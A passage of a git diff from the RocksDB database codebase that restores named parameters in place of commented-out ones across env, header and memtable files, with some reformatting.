Slice(); @@ -922,7 +922,7 @@ size_t PosixWritableFile::GetUniqueId(char* id, size_t max_size) const { */ PosixRandomRWFile::PosixRandomRWFile(const std::string& fname, int fd, - const EnvOptions& /*options*/) + const EnvOptions& options) : filename_(fname), fd_(fd) {} PosixRandomRWFile::~PosixRandomRWFile() { diff --git a/env/io_posix.h b/env/io_posix.h index e83f2df7332..69c98438f27 100644 --- a/env/io_posix.h +++ b/env/io_posix.h @@ -201,7 +201,7 @@ class PosixMmapFile : public WritableFile { // Means Close() will properly take care of truncate // and it does not need any additional information - virtual Status Truncate(uint64_t /*size*/) override { return Status::OK(); } + virtual Status Truncate(uint64_t size) override { return Status::OK(); } virtual Status Close() override; virtual Status Append(const Slice& data) override; virtual Status Flush() override; diff --git a/env/mock_env.cc b/env/mock_env.cc index b59047bdeb6..79a4f8c44a6 100644 --- a/env/mock_env.cc +++ b/env/mock_env.cc @@ -445,8 +445,8 @@ MockEnv::~MockEnv() { // Partial implementation of the Env interface. Status MockEnv::NewSequentialFile(const std::string& fname, - unique_ptr* result, - const EnvOptions& /*soptions*/) { + unique_ptr* result, + const EnvOptions& soptions) { auto fn = NormalizePath(fname); MutexLock lock(&mutex_); if (file_map_.find(fn) == file_map_.end()) { @@ -462,8 +462,8 @@ Status MockEnv::NewSequentialFile(const std::string& fname, } Status MockEnv::NewRandomAccessFile(const std::string& fname, - unique_ptr* result, - const EnvOptions& /*soptions*/) { + unique_ptr* result, + const EnvOptions& soptions) { auto fn = NormalizePath(fname); MutexLock lock(&mutex_); if (file_map_.find(fn) == file_map_.end()) { @@ -480,7 +480,7 @@ Status MockEnv::NewRandomAccessFile(const std::string& fname, Status MockEnv::NewRandomRWFile(const std::string& fname, unique_ptr* result, - const EnvOptions& /*soptions*/) { + const EnvOptions& soptions) { auto fn = NormalizePath(fname); MutexLock lock(&mutex_); if (file_map_.find(fn) == file_map_.end()) { @@ -523,8 +523,8 @@ Status MockEnv::NewWritableFile(const std::string& fname, return Status::OK(); } -Status MockEnv::NewDirectory(const std::string& /*name*/, - unique_ptr* result) { +Status MockEnv::NewDirectory(const std::string& name, + unique_ptr* result) { result->reset(new MockEnvDirectory()); return Status::OK(); } diff --git a/hdfs/env_hdfs.h b/hdfs/env_hdfs.h index 2ed6ba6d8a6..3a62bc8cb92 100644 --- a/hdfs/env_hdfs.h +++ b/hdfs/env_hdfs.h @@ -245,7 +245,7 @@ static const Status notsup; class HdfsEnv : public Env { public: - explicit HdfsEnv(const std::string& /*fsname*/) { + explicit HdfsEnv(const std::string& fsname) { fprintf(stderr, "You have not build rocksdb with HDFS support\n"); fprintf(stderr, "Please see hdfs/README for details\n"); abort(); @@ -258,125 +258,112 @@ class HdfsEnv : public Env { unique_ptr* result, const EnvOptions& options) override; - virtual Status NewRandomAccessFile(const std::string& /*fname*/, - unique_ptr* /*result*/, - const EnvOptions& /*options*/) override { + virtual Status NewRandomAccessFile(const std::string& fname, + unique_ptr* result, + const EnvOptions& options) override { return notsup; } - virtual Status NewWritableFile(const std::string& /*fname*/, - unique_ptr* /*result*/, - const EnvOptions& /*options*/) override { + virtual Status NewWritableFile(const std::string& fname, + unique_ptr* result, + const EnvOptions& options) override { return notsup; } - virtual Status NewDirectory(const std::string& /*name*/, - unique_ptr* /*result*/) override { + virtual Status NewDirectory(const std::string& name, + unique_ptr* result) override { return notsup; } - virtual Status FileExists(const std::string& /*fname*/) override { + virtual Status FileExists(const std::string& fname) override { return notsup; } - virtual Status GetChildren(const std::string& /*path*/, - std::vector* /*result*/) override { + virtual Status GetChildren(const std::string& path, + std::vector* result) override { return notsup; } - virtual Status DeleteFile(const std::string& /*fname*/) override { + virtual Status DeleteFile(const std::string& fname) override { return notsup; } - virtual Status CreateDir(const std::string& /*name*/) override { - return notsup; - } + virtual Status CreateDir(const std::string& name) override { return notsup; } - virtual Status CreateDirIfMissing(const std::string& /*name*/) override { + virtual Status CreateDirIfMissing(const std::string& name) override { return notsup; } - virtual Status DeleteDir(const std::string& /*name*/) override { - return notsup; - } + virtual Status DeleteDir(const std::string& name) override { return notsup; } - virtual Status GetFileSize(const std::string& /*fname*/, - uint64_t* /*size*/) override { + virtual Status GetFileSize(const std::string& fname, + uint64_t* size) override { return notsup; } - virtual Status GetFileModificationTime(const std::string& /*fname*/, - uint64_t* /*time*/) override { + virtual Status GetFileModificationTime(const std::string& fname, + uint64_t* time) override { return notsup; } - virtual Status RenameFile(const std::string& /*src*/, - const std::string& /*target*/) override { + virtual Status RenameFile(const std::string& src, + const std::string& target) override { return notsup; } - virtual Status LinkFile(const std::string& /*src*/, - const std::string& /*target*/) override { + virtual Status LinkFile(const std::string& src, + const std::string& target) override { return notsup; } - virtual Status LockFile(const std::string& /*fname*/, - FileLock** /*lock*/) override { + virtual Status LockFile(const std::string& fname, FileLock** lock) override { return notsup; } - virtual Status UnlockFile(FileLock* /*lock*/) override { return notsup; } + virtual Status UnlockFile(FileLock* lock) override { return notsup; } - virtual Status NewLogger(const std::string& /*fname*/, - shared_ptr* /*result*/) override { + virtual Status NewLogger(const std::string& fname, + shared_ptr* result) override { return notsup; } - virtual void Schedule(void (*/*function*/)(void* arg), void* /*arg*/, - Priority /*pri*/ = LOW, void* /*tag*/ = nullptr, - void (*/*unschedFunction*/)(void* arg) = 0) override {} + virtual void Schedule(void (*function)(void* arg), void* arg, + Priority pri = LOW, void* tag = nullptr, + void (*unschedFunction)(void* arg) = 0) override {} - virtual int UnSchedule(void* /*tag*/, Priority /*pri*/) override { return 0; } + virtual int UnSchedule(void* tag, Priority pri) override { return 0; } - virtual void StartThread(void (*/*function*/)(void* arg), - void* /*arg*/) override {} + virtual void StartThread(void (*function)(void* arg), void* arg) override {} virtual void WaitForJoin() override {} virtual unsigned int GetThreadPoolQueueLen( - Priority /*pri*/ = LOW) const override { + Priority pri = LOW) const override { return 0; } - virtual Status GetTestDirectory(std::string* /*path*/) override { - return notsup; - } + virtual Status GetTestDirectory(std::string* path) override { return notsup; } virtual uint64_t NowMicros() override { return 0; } - virtual void SleepForMicroseconds(int /*micros*/) override {} + virtual void SleepForMicroseconds(int micros) override {} - virtual Status GetHostName(char* /*name*/, uint64_t /*len*/) override { + virtual Status GetHostName(char* name, uint64_t len) override { return notsup; } - virtual Status GetCurrentTime(int64_t* /*unix_time*/) override { - return notsup; - } + virtual Status GetCurrentTime(int64_t* unix_time) override { return notsup; } - virtual Status GetAbsolutePath(const std::string& /*db_path*/, - std::string* /*outputpath*/) override { + virtual Status GetAbsolutePath(const std::string& db_path, + std::string* outputpath) override { return notsup; } - virtual void SetBackgroundThreads(int /*number*/, - Priority /*pri*/ = LOW) override {} - virtual int GetBackgroundThreads(Priority /*pri*/ = LOW) override { - return 0; + virtual void SetBackgroundThreads(int number, Priority pri = LOW) override {} + virtual int GetBackgroundThreads(Priority pri = LOW) override { return 0; } + virtual void IncBackgroundThreadsIfNeeded(int number, Priority pri) override { } - virtual void IncBackgroundThreadsIfNeeded(int /*number*/, - Priority /*pri*/) override {} - virtual std::string TimeToString(uint64_t /*number*/) override { return ""; } + virtual std::string TimeToString(uint64_t number) override { return ""; } virtual uint64_t GetThreadID() const override { return 0; diff --git a/include/rocksdb/cache.h b/include/rocksdb/cache.h index 88efdb05eeb..5ebd66bde88 100644 --- a/include/rocksdb/cache.h +++ b/include/rocksdb/cache.h @@ -189,8 +189,7 @@ class Cache { // Mark the last inserted object as being a raw data block. This will be used // in tests. The default implementation does nothing. - virtual void TEST_mark_as_data_block(const Slice& /*key*/, - size_t /*charge*/) {} + virtual void TEST_mark_as_data_block(const Slice& key, size_t charge) {} private: // No copying allowed diff --git a/include/rocksdb/compaction_filter.h b/include/rocksdb/compaction_filter.h index 94069a91490..9a8c0318c5d 100644 --- a/include/rocksdb/compaction_filter.h +++ b/include/rocksdb/compaction_filter.h @@ -97,10 +97,8 @@ class CompactionFilter { // The last paragraph is not true if you set max_subcompactions to more than // 1. In that case, subcompaction from multiple threads may call a single // CompactionFilter concurrently. - virtual bool Filter(int /*level*/, const Slice& /*key*/, - const Slice& /*existing_value*/, - std::string* /*new_value*/, - bool* /*value_changed*/) const { + virtual bool Filter(int level, const Slice& key, const Slice& existing_value, + std::string* new_value, bool* value_changed) const { return false; } @@ -113,8 +111,8 @@ class CompactionFilter { // may not realize there is a write conflict and may allow a Transaction to // Commit that should have failed. Instead, it is better to implement any // Merge filtering inside the MergeOperator. - virtual bool FilterMergeOperand(int /*level*/, const Slice& /*key*/, - const Slice& /*operand*/) const { + virtual bool FilterMergeOperand(int level, const Slice& key, + const Slice& operand) const { return false; } @@ -159,7 +157,7 @@ class CompactionFilter { // MergeOperator. virtual Decision FilterV2(int level, const Slice& key, ValueType value_type, const Slice& existing_value, std::string* new_value, - std::string* /*skip_until*/) const { + std::string* skip_until) const { switch (value_type) { case ValueType::kValue: { bool value_changed = false; diff --git a/include/rocksdb/db.h b/include/rocksdb/db.h index 7c1cc316ef3..ee5706b4c8b 100644 --- a/include/rocksdb/db.h +++ b/include/rocksdb/db.h @@ -855,7 +855,7 @@ class DB { // Flush the WAL memory buffer to the file. If sync is true, it calls SyncWAL // afterwards. - virtual Status FlushWAL(bool /*sync*/) { + virtual Status FlushWAL(bool sync) { return Status::NotSupported("FlushWAL not implemented"); } // Sync the wal. Note that Write() followed by SyncWAL() is not exactly the diff --git a/include/rocksdb/env.h b/include/rocksdb/env.h index 78864dd7982..8690738998f 100644 --- a/include/rocksdb/env.h +++ b/include/rocksdb/env.h @@ -170,9 +170,9 @@ class Env { // returns non-OK. // // The returned file will only be accessed by one thread at a time. - virtual Status ReopenWritableFile(const std::string& /*fname*/, - unique_ptr* /*result*/, - const EnvOptions& /*options*/) { + virtual Status ReopenWritableFile(const std::string& fname, + unique_ptr* result, + const EnvOptions& options) { return Status::NotSupported(); } @@ -187,9 +187,9 @@ class Env { // *result and returns OK. On failure returns non-OK. // // The returned file will only be accessed by one thread at a time. - virtual Status NewRandomRWFile(const std::string& /*fname*/, - unique_ptr* /*result*/, - const EnvOptions& /*options*/) { + virtual Status NewRandomRWFile(const std::string& fname, + unique_ptr* result, + const EnvOptions& options) { return Status::NotSupported("RandomRWFile is not implemented in this Env"); } @@ -257,8 +257,7 @@ class Env { const std::string& target) = 0; // Hard Link file src to target. - virtual Status LinkFile(const std::string& /*src*/, - const std::string& /*target*/) { + virtual Status LinkFile(const std::string& src, const std::string& target) { return Status::NotSupported("LinkFile is not supported for this Env"); } @@ -309,7 +308,7 @@ class Env { // Arrange to remove jobs for given arg from the queue_ if they are not // already scheduled. Caller is expected to have exclusive lock on arg. - virtual int UnSchedule(void* /*arg*/, Priority /*pri*/) { return 0; } + virtual int UnSchedule(void* arg, Priority pri) { return 0; } // Start a new thread, invoking "function(arg)" within the new thread. // When "function(arg)" returns, the thread will be destroyed. @@ -319,7 +318,7 @@ class Env { virtual void WaitForJoin() {} // Get thread pool queue length for specific thread pool. - virtual unsigned int GetThreadPoolQueueLen(Priority /*pri*/ = LOW) const { + virtual unsigned int GetThreadPoolQueueLen(Priority pri = LOW) const { return 0; } @@ -373,7 +372,7 @@ class Env { virtual void IncBackgroundThreadsIfNeeded(int number, Priority pri) = 0; // Lower IO priority for threads from the specified pool. - virtual void LowerThreadPoolIOPriority(Priority /*pool*/ = LOW) {} + virtual void LowerThreadPoolIOPriority(Priority pool = LOW) {} // Converts seconds-since-Jan-01-1970 to a printable string virtual std::string TimeToString(uint64_t time) = 0; @@ -417,7 +416,7 @@ class Env { const ImmutableDBOptions& db_options) const; // Returns the status of all threads that belong to the current Env. - virtual Status GetThreadList(std::vector* /*thread_list*/) { + virtual Status GetThreadList(std::vector* thread_list) { return Status::NotSupported("Not supported."); } @@ -483,14 +482,14 @@ class SequentialFile { // Remove any kind of caching of data from the offset to offset+length // of this file. If the length is 0, then it refers to the end of file. // If the system is not caching the file contents, then this is a noop. - virtual Status InvalidateCache(size_t /*offset*/, size_t /*length*/) { + virtual Status InvalidateCache(size_t offset, size_t length) { return Status::NotSupported("InvalidateCache not supported."); } // Positioned Read for direct I/O // If Direct I/O enabled, offset, n, and scratch should be properly aligned - virtual Status PositionedRead(uint64_t /*offset*/, size_t /*n*/, - Slice* /*result*/, char* /*scratch*/) { + virtual Status PositionedRead(uint64_t offset, size_t n, Slice* result, + char* scratch) { return Status::NotSupported(); } }; @@ -516,7 +515,7 @@ class RandomAccessFile { char* scratch) const = 0; // Readahead the file starting from offset by n bytes for caching. - virtual Status Prefetch(uint64_t /*offset*/, size_t /*n*/) { + virtual Status Prefetch(uint64_t offset, size_t n) { return Status::OK(); } @@ -535,14 +534,14 @@ class RandomAccessFile { // a single varint. // // Note: these IDs are only valid for the duration of the process. - virtual size_t GetUniqueId(char* /*id*/, size_t /*max_size*/) const { + virtual size_t GetUniqueId(char* id, size_t max_size) const { return 0; // Default implementation to prevent issues with backwards // compatibility. }; enum AccessPattern { NORMAL, RANDOM, SEQUENTIAL, WILLNEED, DONTNEED }; - virtual void Hint(AccessPattern /*pattern*/) {} + virtual void Hint(AccessPattern pattern) {} // Indicates the upper layers if the current RandomAccessFile implementation // uses direct IO. @@ -555,7 +554,7 @@ class RandomAccessFile { // Remove any kind of caching of data from the offset to offset+length // of this file. If the length is 0, then it refers to the end of file. // If the system is not caching the file contents, then this is a noop. - virtual Status InvalidateCache(size_t /*offset*/, size_t /*length*/) { + virtual Status InvalidateCache(size_t offset, size_t length) { return Status::NotSupported("InvalidateCache not supported."); } }; @@ -605,7 +604,9 @@ class WritableFile { // before closing. It is not always possible to keep track of the file // size due to whole pages writes. The behavior is undefined if called // with other writes to follow. - virtual Status Truncate(uint64_t /*size*/) { return Status::OK(); } + virtual Status Truncate(uint64_t size) { + return Status::OK(); + } virtual Status Close() = 0; virtual Status Flush() = 0; virtual Status Sync() = 0; // sync data @@ -667,7 +668,7 @@ class WritableFile { } // For documentation, refer to RandomAccessFile::GetUniqueId() - virtual size_t GetUniqueId(char* /*id*/, size_t /*max_size*/) const { + virtual size_t GetUniqueId(char* id, size_t max_size) const { return 0; // Default implementation to prevent issues with backwards } @@ -675,7 +676,7 @@ class WritableFile { // of this file. If the length is 0, then it refers to the end of file. // If the system is not caching the file contents, then this is a noop. // This call has no effect on dirty pages in the cache. - virtual Status InvalidateCache(size_t /*offset*/, size_t /*length*/) { + virtual Status InvalidateCache(size_t offset, size_t length) { return Status::NotSupported("InvalidateCache not supported."); } @@ -685,9 +686,7 @@ class WritableFile { // This asks the OS to initiate flushing the cached data to disk, // without waiting for completion. // Default implementation does nothing. - virtual Status RangeSync(uint64_t /*offset*/, uint64_t /*nbytes*/) { - return Status::OK(); - } + virtual Status RangeSync(uint64_t offset, uint64_t nbytes) { return Status::OK(); } // PrepareWrite performs any necessary preparation for a write // before the write actually occurs. This allows for pre-allocation @@ -714,7 +713,7 @@ class WritableFile { } // Pre-allocates space for a file. - virtual Status Allocate(uint64_t /*offset*/, uint64_t /*len*/) { + virtual Status Allocate(uint64_t offset, uint64_t len) { return Status::OK(); } diff --git a/include/rocksdb/filter_policy.h b/include/rocksdb/filter_policy.h index d442837e61e..8c813d93e65 100644 --- a/include/rocksdb/filter_policy.h +++ b/include/rocksdb/filter_policy.h @@ -45,7 +45,7 @@ class FilterBitsBuilder { virtual Slice Finish(std::unique_ptr* buf) = 0; // Calculate num of entries fit into a space. - virtual int CalculateNumEntry(const uint32_t /*space*/) { + virtual int CalculateNumEntry(const uint32_t space) { #ifndef ROCKSDB_LITE throw std::runtime_error("CalculateNumEntry not Implemented"); #else @@ -114,8 +114,7 @@ class FilterPolicy { // Get the FilterBitsReader, which is ONLY used for full filter block // It contains interface to tell if key can be in filter // The input slice should NOT be deleted by FilterPolicy - virtual FilterBitsReader* GetFilterBitsReader( - const Slice& /*contents*/) const { + virtual FilterBitsReader* GetFilterBitsReader(const Slice& contents) const { return nullptr; } }; diff --git a/include/rocksdb/iterator.h b/include/rocksdb/iterator.h index cb734eccd93..4e09f64e9a6 100644 --- a/include/rocksdb/iterator.h +++ b/include/rocksdb/iterator.h @@ -51,7 +51,7 @@ class Iterator : public Cleanable { // Position at the last key in the source that at or before target // The iterator is Valid() after this call iff the source contains // an entry that comes at or before target. - virtual void SeekForPrev(const Slice& /*target*/) {} + virtual void SeekForPrev(const Slice& target) {} // Moves to the next entry in the source. After this call, Valid() is // true iff the iterator was not positioned at the last entry in the source. diff --git a/include/rocksdb/listener.h b/include/rocksdb/listener.h index b44c7a6900f..40d318e0941 100644 --- a/include/rocksdb/listener.h +++ b/include/rocksdb/listener.h @@ -345,8 +345,8 @@ class EventListener { // returns. Otherwise, RocksDB may be blocked. // @param handle is a pointer to the column family handle to be deleted // which will become a dangling pointer after the deletion. - virtual void OnColumnFamilyHandleDeletionStarted( - ColumnFamilyHandle* /*handle*/) {} + virtual void OnColumnFamilyHandleDeletionStarted(ColumnFamilyHandle* handle) { + } // A call-back function for RocksDB which will be called after an external // file is ingested using IngestExternalFile. diff --git a/include/rocksdb/memtablerep.h b/include/rocksdb/memtablerep.h index 1256515d570..347dd3096c2 100644 --- a/include/rocksdb/memtablerep.h +++ b/include/rocksdb/memtablerep.h @@ -89,14 +89,14 @@ class MemTableRep { // // Currently only skip-list based memtable implement the interface. Other // implementations will fallback to Insert() by default. - virtual void InsertWithHint(KeyHandle handle, void** /*hint*/) { + virtual void InsertWithHint(KeyHandle handle, void** hint) { // Ignore the hint by default. Insert(handle); } // Like Insert(handle), but may be called concurrent with other calls // to InsertConcurrently for other handles - virtual void InsertConcurrently(KeyHandle /*handle*/) { + virtual void InsertConcurrently(KeyHandle handle) { #ifndef ROCKSDB_LITE throw std::runtime_error("concurrent insert not supported"); #else @@ -128,8 +128,8 @@ class MemTableRep { virtual void Get(const LookupKey& k, void* callback_args, bool (*callback_func)(void* arg, const char* entry)); - virtual uint64_t ApproximateNumEntries(const Slice& /*start_ikey*/, - const Slice& /*end_key*/) { + virtual uint64_t ApproximateNumEntries(const Slice& start_ikey, + const Slice& end_key) { return 0; } diff --git a/include/rocksdb/merge_operator.h b/include/rocksdb/merge_operator.h index c32249ee8fa..5fe3e0bfda8 100644 --- a/include/rocksdb/merge_operator.h +++ b/include/rocksdb/merge_operator.h @@ -66,9 +66,11 @@ class MergeOperator { // internal corruption. This will be treated as an error by the library. // // Also make use of the *logger for error messages. - virtual bool FullMerge(const Slice& /*key*/, const Slice* /*existing_value*/, - const std::deque& /*operand_list*/, - std::string* /*new_value*/, Logger* /*logger*/) const { + virtual bool FullMerge(const Slice& key, + const Slice* existing_value, + const std::deque& operand_list, + std::string* new_value, + Logger* logger) const { // deprecated, please use FullMergeV2() assert(false); return false; @@ -143,10 +145,9 @@ class MergeOperator { // If there is corruption in the data, handle it in the FullMergeV2() function // and return false there. The default implementation of PartialMerge will // always return false. - virtual bool PartialMerge(const Slice& /*key*/, const Slice& /*left_operand*/, - const Slice& /*right_operand*/, - std::string* /*new_value*/, - Logger* /*logger*/) const { + virtual bool PartialMerge(const Slice& key, const Slice& left_operand, + const Slice& right_operand, std::string* new_value, + Logger* logger) const { return false; } diff --git a/include/rocksdb/rate_limiter.h b/include/rocksdb/rate_limiter.h index 995bf952f9f..838c98a6de6 100644 --- a/include/rocksdb/rate_limiter.h +++ b/include/rocksdb/rate_limiter.h @@ -45,7 +45,7 @@ class RateLimiter { // Request for token for bytes. If this request can not be satisfied, the call // is blocked. Caller is responsible to make sure // bytes <= GetSingleBurstBytes() - virtual void Request(const int64_t /*bytes*/, const Env::IOPriority /*pri*/) { + virtual void Request(const int64_t bytes, const Env::IOPriority pri) { assert(false); } diff --git a/include/rocksdb/slice.h b/include/rocksdb/slice.h index b45f95c10b7..fe8dee00f04 100644 --- a/include/rocksdb/slice.h +++ b/include/rocksdb/slice.h @@ -173,7 +173,7 @@ class PinnableSlice : public Slice, public Cleanable { } } - void remove_prefix(size_t /*n*/) { + void remove_prefix(size_t n) { assert(0); // Not implemented } diff --git a/include/rocksdb/slice_transform.h b/include/rocksdb/slice_transform.h index 2143057df8d..fc82bf58456 100644 --- a/include/rocksdb/slice_transform.h +++ b/include/rocksdb/slice_transform.h @@ -58,7 +58,7 @@ class SliceTransform { virtual bool InDomain(const Slice& key) const = 0; // This is currently not used and remains here for backward compatibility. - virtual bool InRange(const Slice& /*dst*/) const { return false; } + virtual bool InRange(const Slice& dst) const { return false; } // Transform(s)=Transform(`prefix`) for any s with `prefix` as a prefix. // @@ -83,7 +83,7 @@ class SliceTransform { // "abcd,e", the file can be filtered out and the key will be invisible. // // i.e., an implementation always returning false is safe. - virtual bool SameResultWhenAppended(const Slice& /*prefix*/) const { + virtual bool SameResultWhenAppended(const Slice& prefix) const { return false; } }; diff --git a/include/rocksdb/statistics.h b/include/rocksdb/statistics.h index ad395cae475..b4629358e66 100644 --- a/include/rocksdb/statistics.h +++ b/include/rocksdb/statistics.h @@ -445,7 +445,7 @@ class Statistics { virtual uint64_t getTickerCount(uint32_t tickerType) const = 0; virtual void histogramData(uint32_t type, HistogramData* const data) const = 0; - virtual std::string getHistogramString(uint32_t /*type*/) const { return ""; } + virtual std::string getHistogramString(uint32_t type) const { return ""; } virtual void recordTick(uint32_t tickerType, uint64_t count = 0) = 0; virtual void setTickerCount(uint32_t tickerType, uint64_t count) = 0; virtual uint64_t getAndResetTickerCount(uint32_t tickerType) = 0; diff --git a/include/rocksdb/utilities/geo_db.h b/include/rocksdb/utilities/geo_db.h index ec3cbdf265a..408774c5990 100644 --- a/include/rocksdb/utilities/geo_db.h +++ b/include/rocksdb/utilities/geo_db.h @@ -80,7 +80,7 @@ class GeoDB : public StackableDB { // GeoDB owns the pointer `DB* db` now. You should not delete it or // use it after the invocation of GeoDB // GeoDB(DB* db, const GeoDBOptions& options) : StackableDB(db) {} - GeoDB(DB* db, const GeoDBOptions& /*options*/) : StackableDB(db) {} + GeoDB(DB* db, const GeoDBOptions& options) : StackableDB(db) {} virtual ~GeoDB() {} // Insert a new object into the location database. The object is diff --git a/include/rocksdb/utilities/optimistic_transaction_db.h b/include/rocksdb/utilities/optimistic_transaction_db.h index 518bc610c6d..02917ff5830 100644 --- a/include/rocksdb/utilities/optimistic_transaction_db.h +++ b/include/rocksdb/utilities/optimistic_transaction_db.h @@ -62,7 +62,7 @@ class OptimisticTransactionDB { protected: // To Create an OptimisticTransactionDB, call Open() - explicit OptimisticTransactionDB(DB* /*db*/) {} + explicit OptimisticTransactionDB(DB* db) {} OptimisticTransactionDB() {} private: diff --git a/include/rocksdb/utilities/transaction.h b/include/rocksdb/utilities/transaction.h index a461c9e856a..8507ef133fb 100644 --- a/include/rocksdb/utilities/transaction.h +++ b/include/rocksdb/utilities/transaction.h @@ -402,8 +402,8 @@ class Transaction { virtual bool IsDeadlockDetect() const { return false; } - virtual std::vector GetWaitingTxns( - uint32_t* /*column_family_id*/, std::string* /*key*/) const { + virtual std::vector GetWaitingTxns(uint32_t* column_family_id, + std::string* key) const { assert(false); return std::vector(); } @@ -423,7 +423,7 @@ class Transaction { void SetState(TransactionState state) { txn_state_ = state; } protected: - explicit Transaction(const TransactionDB* /*db*/) {} + explicit Transaction(const TransactionDB* db) {} Transaction() {} // the log in which the prepared section for this txn resides diff --git a/include/rocksdb/wal_filter.h b/include/rocksdb/wal_filter.h index a22dca92377..686fa499893 100644 --- a/include/rocksdb/wal_filter.h +++ b/include/rocksdb/wal_filter.h @@ -44,8 +44,8 @@ class WalFilter { // @params cf_name_id_map column_family_name to column_family_id map virtual void ColumnFamilyLogNumberMap( - const std::map& /*cf_lognumber_map*/, - const std::map& /*cf_name_id_map*/) {} + const std::map& cf_lognumber_map, + const std::map& cf_name_id_map) {} // LogRecord is invoked for each log record encountered for all the logs // during replay on logs on recovery. This method can be used to: @@ -75,9 +75,11 @@ class WalFilter { // @returns Processing option for the current record. // Please see WalProcessingOption enum above for // details. - virtual WalProcessingOption LogRecordFound( - unsigned long long /*log_number*/, const std::string& /*log_file_name*/, - const WriteBatch& batch, WriteBatch* new_batch, bool* batch_changed) { + virtual WalProcessingOption LogRecordFound(unsigned long long log_number, + const std::string& log_file_name, + const WriteBatch& batch, + WriteBatch* new_batch, + bool* batch_changed) { // Default implementation falls back to older function for compatibility return LogRecord(batch, new_batch, batch_changed); } @@ -85,9 +87,9 @@ class WalFilter { // Please see the comments for LogRecord above. This function is for // compatibility only and contains a subset of parameters. // New code should use the function above. - virtual WalProcessingOption LogRecord(const WriteBatch& /*batch*/, - WriteBatch* /*new_batch*/, - bool* /*batch_changed*/) const { + virtual WalProcessingOption LogRecord(const WriteBatch& batch, + WriteBatch* new_batch, + bool* batch_changed) const { return WalProcessingOption::kContinueProcessing; } diff --git a/include/rocksdb/write_batch.h b/include/rocksdb/write_batch.h index d708933f842..8bd93d36c4e 100644 --- a/include/rocksdb/write_batch.h +++ b/include/rocksdb/write_batch.h @@ -217,9 +217,8 @@ class WriteBatch : public WriteBatchBase { } virtual void SingleDelete(const Slice& /*key*/) {} - virtual Status DeleteRangeCF(uint32_t /*column_family_id*/, - const Slice& /*begin_key*/, - const Slice& /*end_key*/) { + virtual Status DeleteRangeCF(uint32_t column_family_id, + const Slice& begin_key, const Slice& end_key) { return Status::InvalidArgument("DeleteRangeCF not implemented"); } @@ -241,16 +240,16 @@ class WriteBatch : public WriteBatchBase { return Status::InvalidArgument("MarkBeginPrepare() handler not defined."); } - virtual Status MarkEndPrepare(const Slice& /*xid*/) { + virtual Status MarkEndPrepare(const Slice& xid) { return Status::InvalidArgument("MarkEndPrepare() handler not defined."); } - virtual Status MarkRollback(const Slice& /*xid*/) { + virtual Status MarkRollback(const Slice& xid) { return Status::InvalidArgument( "MarkRollbackPrepare() handler not defined."); } - virtual Status MarkCommit(const Slice& /*xid*/) { + virtual Status MarkCommit(const Slice& xid) { return Status::InvalidArgument("MarkCommit() handler not defined."); } diff --git a/memtable/hash_cuckoo_rep.cc b/memtable/hash_cuckoo_rep.cc index 39078633f67..034bf5858b6 100644 --- a/memtable/hash_cuckoo_rep.cc +++ b/memtable/hash_cuckoo_rep.cc @@ -597,8 +597,8 @@ void HashCuckooRep::Iterator::Seek(const Slice& user_key, } // Retreat to the last entry with a key <= target -void HashCuckooRep::Iterator::SeekForPrev(const Slice& /*user_key*/, - const char* /*memtable_key*/) { +void HashCuckooRep::Iterator::SeekForPrev(const Slice& user_key, + const char* memtable_key) { assert(false); } @@ -623,7 +623,7 @@ void HashCuckooRep::Iterator::SeekToLast() { MemTableRep* HashCuckooRepFactory::CreateMemTableRep( const MemTableRep::KeyComparator& compare, Allocator* allocator, - const SliceTransform* /*transform*/, Logger* /*logger*/) { + const SliceTransform* transform, Logger* logger) { // The estimated average fullness. The write performance of any close hash // degrades as the fullness of the mem-table increases. Setting kFullness // to a value around 0.7 can better avoid write performance degradation while diff --git a/memtable/hash_linklist_rep.cc b/memtable/hash_linklist_rep.cc index b23a9f5e51d..932b62a3460 100644 --- a/memtable/hash_linklist_rep.cc +++ b/memtable/hash_linklist_rep.cc @@ -362,14 +362,14 @@ class HashLinkListRep : public MemTableRep { // Advance to the first entry with a key >= target virtual void Seek(const Slice& internal_key, - const char* /*memtable_key*/) override { + const char* memtable_key) override { node_ = hash_link_list_rep_->FindGreaterOrEqualInBucket(head_, internal_key); } // Retreat to the last entry with a key <= target - virtual void SeekForPrev(const Slice& /*internal_key*/, - const char* /*memtable_key*/) override { + virtual void SeekForPrev(const Slice& internal_key, + const char* memtable_key) override { // Since we do not support Prev() // We simply do not support SeekForPrev Reset(nullptr); @@ -483,10 +483,10 @@ class HashLinkListRep : public MemTableRep { } virtual void Next() override {} virtual void Prev() override {} - virtual void Seek(const Slice& /*user_key*/, - const char* /*memtable_key*/) override {} - virtual void SeekForPrev(const Slice& /*user_key*/, - const char* /*memtable_key*/) override {} + virtual void Seek(const Slice& user_key, + const char* memtable_key) override {} + virtual void SeekForPrev(const Slice& user_key, + const char* memtable_key) override {} virtual void SeekToFirst() override {} virtual void SeekToLast() override {} diff --git a/memtable/hash_skiplist_rep.cc b/memtable/hash_skiplist_rep.cc index 93082b1ec28..e34743eb2c7 100644 --- a/memtable/hash_skiplist_rep.cc +++ b/memtable/hash_skiplist_rep.cc @@ -131,8 +131,8 @@ class HashSkipListRep : public MemTableRep { } // Retreat to the last entry with a key <= target - virtual void SeekForPrev(const Slice& /*internal_key*/, - const char* /*memtable_key*/) override { + virtual void SeekForPrev(const Slice& internal_key, + const char* memtable_key) override { // not supported assert(false); } @@ -219,10 +219,10 @@ class HashSkipListRep : public MemTableRep { } virtual void Next() override {} virtual void Prev() override {} - virtual void Seek(const Slice& /*internal_key*/, - const char* /*memtable_key*/) override {} - virtual void SeekForPrev(const Slice& /*internal_key*/, - const char* /*memtable_key*/) override {} + virtual void Seek(const Slice& internal_key, + const char* memtable_key) override {} + virtual void SeekForPrev(const Slice& internal_key, + const char* memtable_key) override {} virtual void SeekToFirst() override {} virtual void SeekToLast() override {} @@ -335,7 +335,7 @@ MemTableRep::Iterator* HashSkipListRep::GetDynamicPrefixIterator(Arena* arena) { MemTableRep* HashSkipListRepFactory::CreateMemTableRep( const MemTableRep::KeyComparator& compare, Allocator* allocator, - const SliceTransform* transform, Logger* /*logger*/) { + const SliceTransform* transform, Logger* logger) { return new HashSkipListRep(compare, allocator, transform, bucket_count_, skiplist_height_, skiplist_branching_factor_); } diff --git a/memtable/skiplistrep.cc b/memtable/skiplistrep.cc index 235d33b818d..f56be5dcb62 100644 --- a/memtable/skiplistrep.cc +++ b/memtable/skiplistrep.cc @@ -270,7 +270,7 @@ class SkipListRep : public MemTableRep { MemTableRep* SkipListFactory::CreateMemTableRep( const MemTableRep::KeyComparator& compare, Allocator* allocator, - const SliceTransform* transform, Logger* /*logger*/) { 